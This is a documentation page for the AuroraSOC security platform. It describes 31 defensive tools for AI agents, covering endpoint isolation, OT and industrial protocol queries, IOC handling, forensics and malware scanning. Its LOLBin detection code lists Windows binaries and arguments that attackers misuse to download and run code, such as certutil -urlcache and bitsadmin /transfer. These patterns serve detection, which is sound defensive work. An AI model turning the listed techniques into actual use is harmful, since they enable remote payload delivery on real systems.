CPS, Network, EDR & Specialized Tools
Beyond SIEM and SOAR, AuroraSOC provides 22 additional tools across six domains. This page covers all remaining tool modules.
EDR Tools (2 tools)
Located in aurorasoc/tools/edr/:
IsolateEndpoint
class IsolateEndpoint(AuroraTool):
name = "isolate_endpoint"
description = "Network-isolate a compromised host via EDR platform"
# Parameters: hostname, isolation_type (full/selective), reason
# Returns: isolation status, management channel info
ScanEndpoint
class ScanEndpoint(AuroraTool):
name = "scan_endpoint"
description = "Execute on-demand security scan via EDR"
# Parameters: hostname, scan_type (quick/full/ioc), targets
# Returns: findings, risk_score, recommendations
CPS Tools (6 tools)
Located in aurorasoc/tools/cps/. The largest tool module, reflecting the complexity of CPS security.
QueryCPSSensor
Reads real-time telemetry from CPS devices via the MQTT bridge:
- Temperature, vibration, voltage readings
- Network activity counters
- Device health status
- Last communication timestamp
VerifyAttestation
Triggers firmware attestation for a specific device:
- Sends attestation challenge to device via MQTT command topic
- Device computes firmware hash and ECDSA signature
- Rust core engine verifies signature
- Returns attestation result (VERIFIED/FAILED)
RevokeCertificate
Revokes a compromised device's TLS certificate:
- Contacts the internal CA or Vault PKI backend
- Adds certificate to CRL (Certificate Revocation List)
- Device will fail TLS handshake on next connection
- Irreversible — always requires human approval
CorrelatePhysicalCyber
Analyzes events for physical-cyber correlations:
- Takes physical event (sensor data) and cyber event (alert)
- Checks temporal proximity (configurable window)
- Evaluates location/zone correlation
- Returns correlation type and confidence
QueryOTProtocol
Queries industrial protocol data:
- Modbus register reads
- DNP3 data point queries
- BACnet property reads
- OPC UA node browsing
IsolateNetworkSegment
Isolates an OT network segment at the firewall/switch:
- Blocks all traffic to/from a specified VLAN or subnet
- Preserves safety-critical communication (configurable whitelist)
- Requires human approval — could disrupt physical processes
Network Tools (3 tools)
Located in aurorasoc/tools/network/:
| Tool | Purpose |
|---|---|
| AnalyzeFlows | Analyze network flow data (NetFlow/IPFIX) for anomalies |
| DetectDNSTunneling | Detect DNS tunneling via entropy and query pattern analysis |
| BlockIP | Block a malicious IP at the network perimeter |
DNS Tunneling Detection
Threat Intel Tools (3 tools)
Located in aurorasoc/tools/threat_intel/:
| Tool | Purpose |
|---|---|
| LookupIOC | Search local DB and external feeds for an IOC |
| EnrichIOC | Add context and store in vector DB |
| ShareIOC | Publish IOC to NATS for cross-site sharing |
Forensics Tools (2 tools)
Located in aurorasoc/tools/forensics/:
| Tool | Purpose |
|---|---|
| CollectEvidence | Gather forensic artifacts from an endpoint |
| TimelineReconstruction | Build chronological event timeline |
Malware Tools (2 tools)
Located in aurorasoc/tools/malware/:
| Tool | Purpose |
|---|---|
| RunYARAScan | Execute YARA rules against files or memory |
| SandboxAnalysis | Submit files to sandbox for behavioral analysis |
UEBA Tools (3 tools)
Located in aurorasoc/tools/ueba/:
| Tool | Purpose |
|---|---|
| HuntLOLBins | Detect Living-Off-the-Land binary usage |
| BaselineDeviation | Detect deviations from user/entity behavioral baselines |
| UserRiskScore | Calculate composite risk score for a user |
LOLBin Detection
class HuntLOLBins(AuroraTool):
"""Detect Living-Off-the-Land binaries used for malicious purposes."""
LOLBIN_PATTERNS = [
{"binary": "certutil.exe", "suspicious_args": ["-urlcache", "-decode"]},
{"binary": "mshta.exe", "suspicious_args": ["http://", "javascript:"]},
{"binary": "regsvr32.exe", "suspicious_args": ["/s", "/u", "http://"]},
{"binary": "rundll32.exe", "suspicious_args": ["javascript:", "shell32"]},
{"binary": "bitsadmin.exe", "suspicious_args": ["/transfer"]},
# ... 20+ more patterns
]
MCP Registry (1 tool)
Located in aurorasoc/tools/registry/:
The MCP (Model Context Protocol) registry server exposes all 31 tools as a single MCP-compatible endpoint. AI agents connect to this registry to discover available tools.
Complete Tool Reference
| # | Tool | Module | Domain |
|---|---|---|---|
| 1 | SearchLogs | siem | Log search |
| 2 | CorrelateEvents | siem | Event correlation |
| 3 | ExtractIOC | siem | IOC extraction |
| 4 | MitreMap | siem | MITRE mapping |
| 5 | ExecutePlaybook | soar | Playbook execution |
| 6 | RequestHumanApproval | soar | Human gate |
| 7 | CreateCase | soar | Case creation |
| 8 | UpdateCase | soar | Case update |
| 9 | GenerateReport | soar | Report generation |
| 10 | IsolateEndpoint | edr | Host isolation |
| 11 | ScanEndpoint | edr | Endpoint scan |
| 12 | QueryCPSSensor | cps | Sensor telemetry |
| 13 | VerifyAttestation | cps | Firmware integrity |
| 14 | RevokeCertificate | cps | Certificate revocation |
| 15 | CorrelatePhysicalCyber | cps | Cross-domain correlation |
| 16 | QueryOTProtocol | cps | Industrial protocol |
| 17 | IsolateNetworkSegment | cps | OT isolation |
| 18 | LookupIOC | threat_intel | IOC lookup |
| 19 | EnrichIOC | threat_intel | IOC enrichment |
| 20 | ShareIOC | threat_intel | IOC sharing |
| 21 | AnalyzeFlows | network | Flow analysis |
| 22 | DetectDNSTunneling | network | DNS telemetry |
| 23 | BlockIP | network | IP blocking |
| 24 | CollectEvidence | forensics | Evidence collection |
| 25 | TimelineReconstruction | forensics | Timeline building |
| 26 | RunYARAScan | malware | YARA scanning |
| 27 | SandboxAnalysis | malware | Sandbox execution |
| 28 | HuntLOLBins | ueba | LOLBin detection |
| 29 | BaselineDeviation | ueba | Behavior analysis |
| 30 | UserRiskScore | ueba | User risk |
| 31 | MCP Registry | registry | Tool discovery |